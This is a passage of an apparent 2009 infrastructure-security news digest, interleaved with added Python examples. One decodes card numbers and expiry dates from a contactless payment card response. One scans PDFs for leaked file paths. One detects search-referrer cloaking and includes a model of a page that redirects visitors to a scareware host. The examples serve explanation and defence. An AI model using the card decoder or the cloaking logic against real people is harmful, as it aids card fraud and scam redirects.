• According to the San Francisco Examiner, water officials are rushing to repair a massive pipe, one of the two that carry drinking water into a San Francisco reservoir and now out of service, to ensure the eastern half of the city continues to have clean water. (See item 18)


18. November 24, San Francisco Examiner – (California) Half of the city in danger of losing water. Water officials are rushing to repair a massive pipe to ensure the eastern half of San Francisco continues to have clean water. With one of the two pipes that carry drinking water into the University Mound Reservoir out of service, the San Francisco Public Utilities Commission, which handles water distribution, is rushing to make the repairs, lest anything damage the second pipe. Joints between steel pipes laid in recent decades inside a tunnel 40 feet underground were found to be corroded late last month after leaking water flooded Tioga Avenue in the Visitacion Valley neighborhood. The corroded, 36-inch pipe, called Crystal Springs 1, is one of two built to carry Hetch Hetchy Valley snowmelt north from the Crystal Springs Reservoir on the Peninsula into the University Mound Reservoir in San Francisco. The water is then stored and distributed to the eastern half of the city, including downtown. All the water that had been carried by the pipe is now being fed through Crystal Springs 2, a 60-inch pipe that runs roughly parallel to the older pipe. It is not known when Crystal Springs 1 began leaking, but 2,200 feet of piping was shut down after the leaks were detected last month, so no water flows through it. If Crystal Springs 2 fails because of old age or an earthquake before Crystal Springs 1 is repaired, the University Mound Reservoir could run dry within two days, according to the Public Utilities Commission’s water manager. The reservoir is one of two major ones in the city. In that scenario, utility workers would have to frantically attempt to reroute the water network to continue providing water for eastern and downtown San Francisco. “If [Crystal Springs] 2 went out for some reason, we would really be hard-pressed to deliver water,” the water manager said. “Our plumbers would have to work miracles.” The Public Utilities Commission is not equipped to repair the corroded pipe itself; repair work by A. Ruiz Construction is expected to last until the end of December, agency documents show. Source: http://www.sfexaminer.com/local/Half-of-The-City-in-danger-of-losing-water-72191267.html


• The Register reported that a bug in Microsoft’s Internet Explorer browser is causing more than 50 million files stored online to leak potentially sensitive information that could compromise user privacy, a security researcher said. (See item 28 in the Information Technology Sector below)


Details

Banking and Finance Sector

9. November 24, CNN – (National) Bank ‘problem’ list climbs to 552. Despite the frenetic pace of bank failures this year, 552 banks are still at risk of going under, according to a government report published Tuesday. The Federal Deposit Insurance Corp. (FDIC) said that the number of lenders on its so-called problem list climbed to its highest level since the end of 1993. At that time, the agency red-flagged 575 banks. Mounting bank failures have proven costly for the FDIC, an agency created to cover the deposits of consumers and businesses in the event that a bank is shut down. On Tuesday, the agency revealed its deposit insurance fund slipped into the red for the first time since 1991. At the end of the quarter on September 30, the value of the fund was $8.2 billion in the hole. But that number accounts for $21.7 billion the agency has set aside in anticipation of future bank failures. The ongoing recession has already claimed 124 banks this year. But fears persist that the number will multiply in coming years because banks are still taking losses on mortgage-related loans and face growing problems with commercial real estate. The banks that end up on the problem list are considered the most likely to fail because of difficulties with their finances, operations or management. Still, history has shown just 13% of banks on the list have failed on average. Source: http://money.cnn.com/2009/11/24/news/companies/fdic_list/index.htm


10. November 23, WFAA 8 Dallas-Fort Worth – (National) Electronic pickpocketing threatens credit cards, passports. Thousands of travelers and consumers can fall victim to electronic pickpocketing and never even know it because they carry new credit cards and U.S. passports. Credit card issuers, along with the U.S. State Department, have begun installing radio frequency identification (RFID) chips in credit cards and passports because the technology holds more data than magnetic stripes and can be read more quickly. But that convenience, experts warn, can also put people at risk of having their information taken. RFID chips are commonly found in cards used to raise gates in parking garages and unlock doors at businesses: all one has to do is hold the card in front of a reader. Within the last few years, that same technology has been introduced to credit cards and U.S. passports, potentially putting holders at risk. It does not matter if the cards are kept in a wallet or a purse, since they transmit through them when prompted by an RFID reader, and such readers are for sale on eBay. Using free software and an RFID reader placed within a few inches of the card, an attacker can easily obtain account numbers and expiration dates. The only credit cards that are vulnerable are those that allow users to tap or pass a reader to pay rather than swiping. Some also carry a symbol that indicates they transmit. Source: http://www.wfaa.com/home/Electronic-pick-pocketing-threatens-credit-cards-passports-72070657.html
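What "obtain account numbers and expiration dates" looks like at the byte level, as an added example that is not part of the WFAA story: a contactless EMV payment card answers a READ RECORD command with BER-TLV data, and tag 57 (Track 2 Equivalent Data) holds the PAN and expiry without encryption. The parser below decodes such a record. The response it parses is constructed in-line using the well-known test PAN 4111111111111111; nothing is read from real hardware, and the template layout (tag 70 wrapping 57, 5F24 and 5A) is an assumption about one plausible record, not a transcript of any particular card.

```python
"""Decode what a contactless EMV card hands a reader in the clear.
Added example; the sample READ RECORD response is constructed here."""


def parse_tlv(data: bytes):
    """Yield (tag, value) for every primitive BER-TLV object in `data`,
    descending into constructed templates such as 70 (bit 0x20 of the
    first tag byte set).  Handles multi-byte tags (5F24) and long lengths."""
    i = 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):            # inter-object padding
            i += 1
            continue
        start, first = i, data[i]
        i += 1
        if first & 0x1F == 0x1F:               # more tag bytes while bit 0x80 is set
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i]
        length = data[i]
        i += 1
        if length & 0x80:                      # long form: low bits = number of length bytes
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:
            yield from parse_tlv(value)
        else:
            yield tag, value


def luhn_ok(pan: str) -> bool:
    """Mod-10 check digit test that every real PAN passes."""
    total = 0
    for pos, ch in enumerate(reversed(pan)):
        d = int(ch)
        if pos % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def decode_track2(value: bytes) -> dict:
    """Track 2 Equivalent Data: PAN, 'D' separator, YYMM expiry, three-digit
    service code, discretionary data, 'F' padding to a whole byte."""
    digits = value.hex().upper().rstrip("F")
    pan, _, rest = digits.partition("D")
    return {"pan": pan, "expiry": "20%s-%s" % (rest[:2], rest[2:4]),
            "service_code": rest[4:7], "luhn_ok": luhn_ok(pan)}


def extract_card_data(response: bytes) -> dict:
    """Take a full READ RECORD response (data + SW1SW2) and return what the
    reader learns.  Falls back to tag 5A (PAN) and 5F24 (expiry YYMMDD)
    when the record carries no Track 2 data."""
    if response[-2:] != b"\x90\x00":
        raise ValueError("card returned status %s" % response[-2:].hex())
    objects = dict(parse_tlv(response[:-2]))
    if b"\x57" in objects:
        return decode_track2(objects[b"\x57"])
    pan = objects[b"\x5a"].hex().upper().rstrip("F")
    exp = objects[b"\x5f\x24"].hex()
    return {"pan": pan, "expiry": "20%s-%s" % (exp[:2], exp[2:4]),
            "service_code": None, "luhn_ok": luhn_ok(pan)}


def tlv(tag: bytes, value: bytes) -> bytes:
    """Encode one short-form BER-TLV object (value shorter than 128 bytes)."""
    return tag + bytes([len(value)]) + value


# Constructed sample: record template 70 holding Track 2 data, an expiry date
# and the PAN, followed by the 9000 success status word.  Test PAN only.
TRACK2 = bytes.fromhex("4111111111111111D1210101" + "00000000000000")
SAMPLE_RESPONSE = tlv(b"\x70",
                      tlv(b"\x57", TRACK2)
                      + tlv(b"\x5f\x24", bytes.fromhex("121031"))
                      + tlv(b"\x5a", bytes.fromhex("4111111111111111"))) + b"\x90\x00"

if __name__ == "__main__":
    print(extract_card_data(SAMPLE_RESPONSE))
```

The PAN and expiry come out of the card unprotected, which is the story's point; the caveat a practitioner should add is that the discretionary data in the chip's Track 2 record generally carries a card verification value that differs from the one on the magnetic stripe, so the data supports card-not-present fraud more readily than stripe cloning.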


11. November 23, DarkReading – (International) Employees willing to steal data; companies on the alert. Employees know it is illegal to steal company data, but they are prepared to do it anyway. Companies know their employees are a chief threat to their data, but most are not doing much about it. These are the takeaways from two separate studies published today by security vendors Cyber-Ark and Actimize. Taken together, the studies paint a sobering picture of the state of trust and security within the corporate walls. In its study, Cyber-Ark surveyed some 600 workers in the financial districts of New York and London and found that most workers are not shy about taking work home — and keeping it for their own use. Eighty-five percent of the respondents to the Cyber-Ark survey said they know it is illegal to download company data for personal use, but 41 percent said they already have taken sensitive data with them to a new position. About a third of respondents said they would share sensitive information with friends or family in order to help them land a job. Almost half of the respondents (48 percent) admitted if they were fired tomorrow they would take company information with them, Cyber-Ark says. Thirty-nine percent of people would download company/competitive information if they got wind that their job were at risk. A quarter of workers said the recession has made them feel less loyal toward their employers. Of those who plan to take competitive or sensitive corporate data, 64 percent said they would do so “just in case” the data might prove useful or advantageous in the future. Twenty-seven percent said they would use the data to negotiate their new position, while 20 percent plan to use it as a tool in their new job. Customer and contact lists were the top priority for employees to steal, registering 29 percent of the respondents. Plans and proposals were next (18 percent), with product information bringing up the rear (11 percent). Thirteen percent of savvy thieves said they would take access and password codes so they could get into the network once they have left the company and continue downloading information and accessing data. Source: http://www.darkreading.com/insiderthreat/security/management/showArticle.jhtml?articleID=221900815


Information Technology


27. November 24, IDG News Services – (International) Microsoft issues security advisory on IE vulnerability. Microsoft on November 23 issued a security advisory that provides customers with guidance and workarounds for dealing with a zero-day exploit aimed at Internet Explorer. Earlier in the day, the company said it was investigating the incident, which emerged over the weekend when someone published the exploit code to the Bugtraq mailing list. By Monday night, Microsoft switched gears and issued the advisory. No active exploitation of the vulnerability had been reported at that point. Microsoft released Security Advisory 977981, which includes workarounds for a flaw in Internet Explorer’s handling of Cascading Style Sheets that could allow remote code execution. Vulnerabilities that allow remote code execution generally result in patches rated critical by Microsoft. The advisory confirmed the vulnerability affects IE 6 on Windows 2000 Service Pack 4, and IE 6 and IE 7 on supported editions of XP, Vista, Windows Server 2003 and Windows Server 2008. Microsoft said users running IE 7 on Vista can run the browser in Protected Mode to limit the impact of the vulnerability. It also recommended setting the Internet zone security setting to “High” to protect against the exploit; the “High” setting disables JavaScript, which currently is the only confirmed attack vector. Microsoft said IE 5.01 Service Pack 4 and IE 8 on all supported versions of Windows are not affected. For an attack to work, the attacker would first have to get the victim to visit a Web site that hosts the exploit code. This could be a malicious Web site set up by the attacker or a site that allows users to upload content. Another way cyber criminals have launched this type of attack, however, is by hacking into legitimate Web sites. Earlier this week, for example, citizens’ band radio vendor Cobra Electronics disclosed that it had been hacked in June, most likely by a professional hacker who used the site to push malware to customers. Source: http://www.computerworld.com/s/article/9141378/Microsoft_issues_security_advisory_on_IE_vulnerability


28. November 23, The Register – (International) IE bug leaks private details from 50m PDF files. A bug in Microsoft’s Internet Explorer browser is causing more than 50 million files stored online to leak potentially sensitive information that could compromise user privacy, a security researcher said. The documents, stored in Adobe’s PDF format, display the internal disk location where the file was stored, an oversight that can inadvertently expose real-world names and login IDs of users, the operating system being used and other information that is better kept private. The data can then be retrieved using simple web searches. A Google search for PDFs containing a C: drive path (The Register links to one) turns up almost four million documents residing on users’ C drives alone. Combined with searches for other common drive letters, the technique exposes more than 50 million files that display the local disk path, according to Inferno, a security researcher for a large software company who asked that his real name not be used. “If they have those kind of PDFs, somebody can use search engines to find out user names or do more reconnaissance on the operating systems used,” he told The Register. “That actually invades the privacy of a user.” The potentially sensitive data is included in PDFs that have been printed using Internet Explorer: the full path of the source file is appended to the document’s contents as soon as the Microsoft browser is used to print it. Although the data is not always visible when the document is viewed in Adobe Reader, it is easily readable when the file is opened in an editor such as Notepad, and the text is also available to Google and other search engines. One PDF cited by The Register, for example, was stored at C:\Program Files\Wids7\WizardReport.htm at the time of printing. The path makes it clear that the file was stored on a Windows machine that has software from Worldwide Instructional Design System installed. Other PDFs give up directory names that reveal authors, projects or other data that may have been designated confidential. The only way to remove the path is to erase the text in an editor and save the document. Source: http://www.theregister.co.uk/2009/11/23/internet_explorer_file_disclosure_bug/
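The check a publisher would want before putting PDFs online, as an added example that is not code from The Register or the researcher: a scanner that pulls every literal string out of a PDF, including strings inside FlateDecode content streams where a printed page footer ends up, and reports any drive-letter path or file:/// URL. The PDFs it scans are constructed in-line by the `make_pdf` helper; the Wids7 path is the one quoted in the article, and everything else (the page layout, the footer text) is made up for the test.

```python
"""Find local file paths leaked into a PDF's text.  Added example; the
PDFs scanned here are constructed by make_pdf(), not real documents."""
import re
import zlib

# Drive-letter path, or a file:/// URL to one, captured to the end of the string.
# The lookbehind stops "http://" from matching as a drive "p:/".
PATH_RE = re.compile(r"(?:file:///)?(?<![A-Za-z0-9])[A-Za-z]:[\\/][^\r\n]*")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
ESCAPES = {0x6E: 10, 0x72: 13, 0x74: 9, 0x62: 8, 0x66: 12}   # \n \r \t \b \f


def pdf_literal_strings(data: bytes):
    """Yield decoded '( ... )' literal strings, honouring backslash escapes,
    \\ddd octal escapes and balanced unescaped parentheses (ISO 32000-1, 7.3.4.2)."""
    i, n = 0, len(data)
    while i < n:
        if data[i] != 0x28:                      # '('
            i += 1
            continue
        i, depth, out = i + 1, 1, bytearray()
        while i < n and depth:
            c = data[i]
            if c == 0x5C and i + 1 < n:          # backslash escape
                e = data[i + 1]
                if 0x30 <= e <= 0x37:            # octal, up to three digits
                    j = i + 1
                    while j < n and j < i + 4 and 0x30 <= data[j] <= 0x37:
                        j += 1
                    out.append(int(data[i + 1:j], 8) & 0xFF)
                    i = j
                    continue
                if e not in (0x0A, 0x0D):        # backslash-newline is a continuation
                    out.append(ESCAPES.get(e, e))
                i += 2
                continue
            if c == 0x28:
                depth += 1
            elif c == 0x29:
                depth -= 1
            if depth:
                out.append(c)
            i += 1
        yield bytes(out)


def stream_bodies(pdf: bytes):
    """Yield each stream's data, inflated when its dictionary names /FlateDecode.
    Other filters and object streams are not handled (simplification)."""
    for m in STREAM_RE.finditer(pdf):
        body = m.group(1)
        dictionary = pdf[pdf.rfind(b" obj", 0, m.start()):m.start()]
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass
        yield body


def find_local_paths(pdf: bytes) -> list:
    """Return every distinct local path found in the PDF's literal strings,
    scanning the object text (streams blanked out) plus each decoded stream."""
    found = []
    blobs = [STREAM_RE.sub(b"stream\nendstream", pdf)] + list(stream_bodies(pdf))
    for blob in blobs:
        for s in pdf_literal_strings(blob):
            m = PATH_RE.search(s.decode("latin-1"))
            if m and m.group(0) not in found:
                found.append(m.group(0))
    return found


def make_pdf(footer: str, compress: bool) -> bytes:
    """Build a one-page PDF whose content stream draws `footer` as text, the way
    a browser's print footer lands in the file.  Constructed test input."""
    text = footer.encode("latin-1")
    for raw, esc in ((b"\\", b"\\\\"), (b"(", b"\\("), (b")", b"\\)")):
        text = text.replace(raw, esc)
    content = b"BT /F1 9 Tf 36 20 Td (" + text + b") Tj ET"
    filt = b""
    if compress:
        content, filt = zlib.compress(content), b" /Filter /FlateDecode"
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>",
        b"<< /Length %d%s >>\nstream\n%s\nendstream" % (len(content), filt, content),
    ]
    out, offsets = bytearray(b"%PDF-1.4\n"), []
    for num, body in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_at)
    return bytes(out)


if __name__ == "__main__":
    print(find_local_paths(make_pdf("file:///C:/Program Files/Wids7/WizardReport.htm", True)))
```

Run `find_local_paths(open(path, "rb").read())` over a directory before publishing; a hit means the file needs the path removed and re-saved, as the article says. Text drawn with glyph IDs through an embedded font, hex strings, and streams using filters other than FlateDecode are not covered by this scanner, so a clean result is evidence rather than proof.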


29. November 23, The Register – (International) Google hoodwinked into pushing Chrome OS scareware. Rogue anti-virus scammers have tainted search results for Chromium OS, the open source version of Google’s Chrome OS, in a bid to expose surfers hunting for the web operating system to a fake anti-virus scan scam instead. Search terms such as “chromium os download” point to sites featuring scripts that redirect stray surfers towards scareware scam portals. These sites falsely report that users’ PCs are loaded with malware before pushing users to download a clean-up tool of little or no utility. The SecureKeeper utility offered through the scam uses a series of aggressive and misleading tricks to coerce people into paying $49.95 for a licence, as explained in a blog post by security firm eSoft. Something very similar happened when Google released its Wave collaboration tool. In both cases, surfers are only redirected to scareware-punting portals when they arrive at the booby-trapped URLs via Google search results; a visitor who reaches the same URL any other way is served the doctored page itself. Both the Google Wave and Chromium OS scams refer to a product or service that is not yet generally available, a factor that arguably increases the potency of the scams. Both attacks (like many before them) rely on black hat Search Engine Optimisation techniques. Cybercrooks typically break into well-established sites and create webpages stuffed full of relevant keywords, cross-linked to other sites doctored using the same technique. The tactic is geared towards tricking search engines into ranking the manipulated URLs higher for the targeted terms. Source: http://www.theregister.co.uk/2009/11/23/chromium_scareware/
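The referrer-conditional redirect described above is what makes these pages hard to spot from a crawler or an admin's browser, so the check a responder wants is to fetch the same URL under several client profiles and compare. The block below is an added example, not code from The Register or eSoft: `cloaked_page` models the doctored page's behaviour as the article describes it, and `probe_for_cloaking` is the detector. The scareware host, the compromised site and the search-engine host list are hypothetical; `fetch` is any callable returning `(status, headers, body)` without following redirects.

```python
"""Detect a search-referrer-conditional redirect.  Added example; hosts are
hypothetical .example names and cloaked_page() is a model, not a real site."""
from urllib.parse import parse_qs, urlparse

SCAREWARE_URL = "http://scareware.example/scan"          # hypothetical scam portal
SEARCH_HOSTS = ("google.", "bing.", "yahoo.")            # assumed list of referrers that trigger the bounce
STUFFED_HTML = b"<html><title>chromium os download</title>chromium os download chromium os download</html>"


def cloaked_page(headers: dict):
    """Model of a doctored page: a visitor whose Referer is a search results page
    (search host plus a q= query) is bounced to the scam portal; crawlers and
    anyone who types the URL directly get the keyword-stuffed page that earned
    the ranking.  Returns (status, response headers, body)."""
    ref = urlparse(headers.get("Referer", ""))
    from_search = any(h in ref.netloc.lower() for h in SEARCH_HOSTS) and "q" in parse_qs(ref.query)
    if from_search:
        return 302, {"Location": SCAREWARE_URL}, b""
    return 200, {"Content-Type": "text/html"}, STUFFED_HTML


# Client profiles to compare: direct visit, arrival from a Google search, and a
# crawler user agent.  Any divergence between them is the cloaking signature.
PROFILES = {
    "direct": {"User-Agent": "Mozilla/5.0"},
    "from_google": {"User-Agent": "Mozilla/5.0",
                    "Referer": "https://www.google.com/search?q=chromium+os+download"},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
}


def probe_for_cloaking(fetch, url: str) -> dict:
    """Fetch `url` once per profile via fetch(url, headers) -> (status, headers, body),
    which must not follow redirects, and report whether the answers diverge.
    Off-site 3xx targets are listed per profile for the analyst."""
    statuses, redirects = {}, {}
    for name, hdrs in PROFILES.items():
        status, resp_headers, _body = fetch(url, hdrs)
        statuses[name] = status
        if 300 <= status < 400 and "Location" in resp_headers:
            target = resp_headers["Location"]
            if urlparse(target).netloc and urlparse(target).netloc != urlparse(url).netloc:
                redirects[name] = target
    cloaked = len(set(statuses.values())) > 1
    return {"cloaked": cloaked, "statuses": statuses, "redirects": redirects}


if __name__ == "__main__":
    offline_fetch = lambda url, headers: cloaked_page(headers)   # stands in for a real HTTP client
    print(probe_for_cloaking(offline_fetch, "http://compromised-blog.example/chromium-os-download.html"))
```

Against a live site, pass a `fetch` built on `urllib.request` with a redirect handler whose `redirect_request` returns `None`, so the 302 itself is observed rather than followed; a page that answers 200 to everyone but 302 to a search referrer is the pattern the article describes.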


30. November 23, Wall Street Journal – (International) EarthLink says email service restored. EarthLink on Monday blamed a server migration for the outages that disrupted email service for its customers over the weekend, but said the problem has been solved. Many EarthLink subscribers lost email access over the weekend because of the migration. “Some EarthLink email customers experienced a delay in receiving emails over the weekend. This issue was associated with EarthLink’s migration of our MindSpring customers to a new EarthLink email server,” a spokeswoman for the Atlanta Internet-services provider said in a statement. “EarthLink has corrected the problem and we believe all delayed emails have been delivered to our customers.” Source: http://blogs.wsj.com/digits/2009/11/23/earthlink-says-email-service-restored/


Communications Sector

31. November 24, McClatchy – (Texas) TWTC fire in Dallas blamed for Sunday Internet outage. A short-circuit and fire in Dallas is being blamed for a broadband outage Sunday night that left 7,314 Windstream customers in Kerrville and the surrounding Hill Country without Internet access for about 12 hours. A division vice president for Windstream, a telecommunications company providing Internet and telephone service, said the problem was with equipment belonging to Time Warner Telecom. In order to provide broadband service to Kerrville, Windstream uses data transport lines operated by Time Warner Telecom that connect to a central hub in Dallas. He said he was informed by Time Warner Telecom that a short-circuit in its equipment caused a “localized fire,” which caused an outage from around 3:50 p.m. Sunday until 4:10 a.m. Monday. The outage affected customers from Kerrville to the Harper area. Source: http://www.tradingmarkets.com/.site/news/Stock News/2676502/


For more stories, see item 30 above in the Information Technology Sector